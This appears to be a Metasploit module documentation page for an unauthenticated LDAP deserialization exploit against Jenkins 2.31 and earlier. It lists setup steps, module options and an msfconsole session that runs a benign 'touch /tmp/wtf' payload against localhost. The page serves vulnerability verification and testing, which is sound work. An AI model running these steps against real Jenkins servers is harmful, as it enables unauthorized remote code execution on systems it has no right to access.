CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

Vulnerable Application

Jenkins 2.31 or below is vulnerable and can be downloaded from updates.jenkins-ci.org

This vulnerability does not require authentication and only HTTP access to the vulnerable application is required.

Verification Steps

1. Download jenkins 2.31

2. Install jenkins java -jar jenkins.war

3. Start msfconsole

4. Do: use exploit/linux/misc/jenkins_ldap_deserialize

5. Do: set RHOST [target host]

6. Do: set PAYLOAD cmd/unix/generic

7. Do: set CMD 'touch /tmp/wtf'

8. Do: run

9. It should create /tmp/wtf on the target host.

Required Options

RHOST

The address of the jenkins server.

Options

RPORT

The http port for the jenkins server. (Defaults to 8080)

TARGETURI

The path to the target instance of Jenkins. (Defaults to /)

SRVHOST

The local address to listen for the LDAP request on. (Defaults to 127.0.0.1)

SRVPORT

The local port to listen for the LDAP request on. (Defaults to 1389)

LDAPHOST

The ldap host the exploit will connect to. Can be different from SRVHOST if in a environment where there is port forwarding. (Defaults to 127.0.0.1)

Scenarios

Example usage against a unix target running Jenkins 2.31.

msf > use exploit/linux/misc/jenkins_ldap_deserialize
msf exploit(jenkins_ldap_deserialize) > set TARGETURI /
TARGETURI => /
msf exploit(jenkins_ldap_deserialize) > set RHOST 127.0.0.1
RHOST => 127.0.0.1
msf exploit(jenkins_ldap_deserialize) > set RPORT 8080
RPORT => 8080
msf exploit(jenkins_ldap_deserialize) > set PAYLOAD cmd/unix/generic
PAYLOAD => cmd/unix/generic
msf exploit(jenkins_ldap_deserialize) > set CMD 'touch /tmp/wtf'
CMD => touch /tmp/wtf
msf exploit(jenkins_ldap_deserialize) > run
[*] Exploit completed, but no session was created.